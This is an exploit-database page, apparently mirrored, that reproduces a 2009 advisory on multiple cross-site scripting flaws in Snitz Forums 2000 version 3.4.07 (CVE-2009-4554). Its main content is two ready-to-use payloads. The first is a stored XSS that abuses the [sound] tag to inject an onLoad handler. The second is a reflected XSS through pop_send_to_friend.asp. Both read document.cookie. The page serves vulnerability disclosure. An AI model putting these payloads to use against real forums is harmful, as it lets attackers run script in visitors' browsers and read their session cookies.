[] NeoSense
E X P L O I T S
title author type platform port cve id

Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities

Author: Andrea Fabrizi
type: webapps
platform: asp
port: 
date_added: 2009-10-14 
date_updated:  
verified: 1 
codes: CVE-2009-4554;OSVDB-61568;OSVDB-61567 
tags: 
aliases:  
screenshot_url:  
application_url: 
**************************************************************
Application: Snitz Forums 2000
Version affected:  3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi () gmail com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************

###### PERMANENT XSS
If [sound] tag is allowed:

[sound]http://url_to_valid_mp3_or_m3u_file.m3u";
onLoad="alert(document.cookie)[/sound]
######

###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=&lt;/textarea&gt;<img
src="http://www.google.it/intl/it_it/images/logo.gif"; onLoad
="alert(document.cookie)">

Note the space: onLoad<space>="alert(document.cookie)"
######
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.